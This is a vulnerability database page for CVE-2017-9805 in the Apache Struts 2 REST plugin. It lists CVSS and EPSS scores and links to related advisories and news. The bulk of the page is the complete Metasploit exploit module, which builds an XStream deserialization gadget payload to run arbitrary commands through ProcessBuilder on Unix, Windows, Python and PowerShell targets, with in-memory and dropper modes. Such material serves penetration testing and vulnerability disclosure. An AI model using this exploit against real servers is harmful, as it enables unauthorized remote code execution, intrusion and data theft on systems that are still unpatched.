Lucene search
HistorySep 08, 2017 - 12:30 a.m.
Apache Struts 2 REST Plugin XStream RCE
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, using the REST plugin, are vulnerable to a Java deserialization attack in the XStream library.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts 2 REST Plugin XStream RCE',
'Description' => %q{
Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12,
using the REST plugin, are vulnerable to a Java deserialization attack
in the XStream library.
},
'Author' => [
'Man Yue Mo', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['CVE', '2017-9805'],
['URL', 'https://struts.apache.org/docs/s2-052.html'],
['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],
['URL', 'https://github.com/mbechler/marshalsec']
],
'DisclosureDate' => '2017-09-05',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'python', 'linux', 'win'],
'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory
],
['Windows (In-Memory)',
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :win_memory
],
['Python (In-Memory)',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Type' => :py_memory
],
['PowerShell (In-Memory)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_memory
],
['Linux (Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
],
['Windows (Dropper)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper
]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3'])
])
end
def check
return CheckCode::Appears if execute_command(rand_str)
CheckCode::Safe
end
def exploit
case target['Type']
when /memory/
execute_command(payload.encoded)
when /dropper/
execute_cmdstager
end
end
def execute_command(cmd, opts = {})
cmd =
case target['Type']
when :unix_memory, :linux_dropper
%W{/bin/sh -c #{cmd}}
when :py_memory
%W{python -c #{cmd}}
when :psh_memory
if payload
cmd_psh_payload(
cmd,
payload.arch.first,
remove_comspec: true,
encode_final_payload: true
).split
else
%W{powershell.exe -c #{cmd}}
end
when :win_memory, :win_dropper
%W{cmd.exe /c #{cmd}}
end
# Encode each command argument with XML entities
cmd.map! { |arg| arg.encode(xml: :text) }
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/xml',
'data' => xstream_payload(cmd)
)
return false unless check_response(res)
true
end
# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO
def xstream_payload(cmd)
# XXX: <spillLength> and <read> need to be removed for Windows
<<EOF
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>#{cmd.join('</string><string>')}</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>#{rand_str}</name>
</filter>
<next class="string">#{rand_str}</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
EOF
end
def check_response(res)
res && res.code == 500 && res.body.include?(error_string)
end
def error_string
'java.lang.String cannot be cast to java.security.Provider$Service'
end
def rand_str
Rex::Text.rand_text_alphanumeric(8..42)
end
end
Related
cisa
cisa
Oracle Patches Apache Vulnerabilities
2017-09-25 00:00:00
dsquare
dsquare
Apache Struts REST Plugin XStream RCE
2018-04-20 00:00:00
osv
osv
REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
2018-10-16 19:37:56
CVE-2017-9805
2017-09-15 19:29:00
Apache Struts Improper Input Validation vulnerability
2018-10-16 19:36:43
seebug
seebug
Apache Struts2 S2-052 (CVE-2017-9805)
2017-09-06 00:00:00
f5
f5
K84144321 : Apache Struts vulnerability CVE-2017-9805
2017-09-06 00:00:00
prion
prion
Deserialization of untrusted data
2017-09-15 19:29:00
exploitpack
exploitpack
Apache Struts 2.5 2.5.12 - REST Plugin XStream Remote Code Execution
2017-09-06 00:00:00
saint
saint
Apache Struts REST plugin XStream deserialization vulnerability
2017-09-08 00:00:00
Apache Struts REST plugin XStream deserialization vulnerability
2017-09-08 00:00:00
Apache Struts REST plugin XStream deserialization vulnerability
2017-09-08 00:00:00
packetstorm
packetstorm
Apache Struts 2 REST Plugin XStream Remote Code Execution
2017-09-07 00:00:00
Apache Struts 2.5.12 XStream Remote Code Execution
2017-09-07 00:00:00
nessus
nessus
zdt
zdt
Apache Struts 2.5 - Remote Code Execution Exploit
2017-09-07 00:00:00
cert
cert
openvas
openvas
Apache Struts Security Update (S2-052) - Active Check
2017-09-07 00:00:00
Apache Struts Security Update (S2-051, S2-052) - Version Check
2019-08-28 00:00:00
trendmicroblog
trendmicroblog
checkpoint_advisories
checkpoint_advisories
cloudfoundry
cloudfoundry
CVE-2017-9805: Apache Struts Remote Code Execution | Cloud Foundry
2017-09-08 00:00:00
impervablog
impervablog
How Reputation Intelligence Improves Application Security
2017-11-13 16:30:38
RedisWannaMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits
2018-03-08 18:45:38
The State of Web Application Vulnerabilities in 2017
2017-12-28 17:20:47
attackerkb
attackerkb
CVE-2017-9805
2017-09-15 00:00:00
CVE-2017-9791
2017-07-10 00:00:00
github
github
thn
thn
Critical Flaw in Apache Struts2 Lets Hackers Take Over Web Servers
2017-09-05 07:40:00
Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw
2017-09-13 21:38:00
New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers
2018-08-22 14:04:00
redhatcve
redhatcve
CVE-2017-9805
2017-09-05 14:19:21
myhack58
myhack58
cisa_kev
cisa_kev
Apache Struts Deserialization of Untrusted Data Vulnerability
2021-11-03 00:00:00
ubuntucve
ubuntucve
CVE-2017-9805
2017-09-15 00:00:00
cve
cve
CVE-2017-9805
2017-09-15 19:29:00
nuclei
nuclei
Apache Struts2 S2-052 - Remote Code Execution
2021-02-21 14:01:07
Apache Struts2 S2-053 - Remote Code Execution
2021-02-21 14:01:50
Apache Struts2 S2-053 - Remote Code Execution
2021-02-21 15:39:29
exploitdb
exploitdb
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
2017-09-06 00:00:00
talosblog
talosblog
Another Apache Struts Vulnerability Under Active Exploitation
2017-09-07 15:42:00
2018 in Snort Rules
2019-02-06 08:19:00
threatpost
threatpost
Apache Foundation Refutes Involvement in Equifax Breach
2017-09-11 15:02:31
Equifax Confirms March Struts Vulnerability Behind Breach
2017-09-14 16:00:34
Patch Released for Critical Apache Struts Bug
2017-09-05 14:10:54
pentestit
pentestit
S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)
2017-09-07 05:33:35
fortinet
fortinet
Apache Struts RCE Vulnerability
2017-09-29 00:00:00
ibm
ibm
cisco
cisco
kitploit
kitploit
Sn1per v5.0 - Automated Pentest Recon Scanner
2018-07-05 13:45:00
Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts
2018-11-24 12:43:00
Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts
2019-05-12 13:09:00
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
oracle
oracle
Oracle Critical Patch Update - October 2017
2017-10-17 00:00:00
8.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
Related for MSF:EXPLOIT-MULTI-HTTP-STRUTS2_REST_XSTREAM-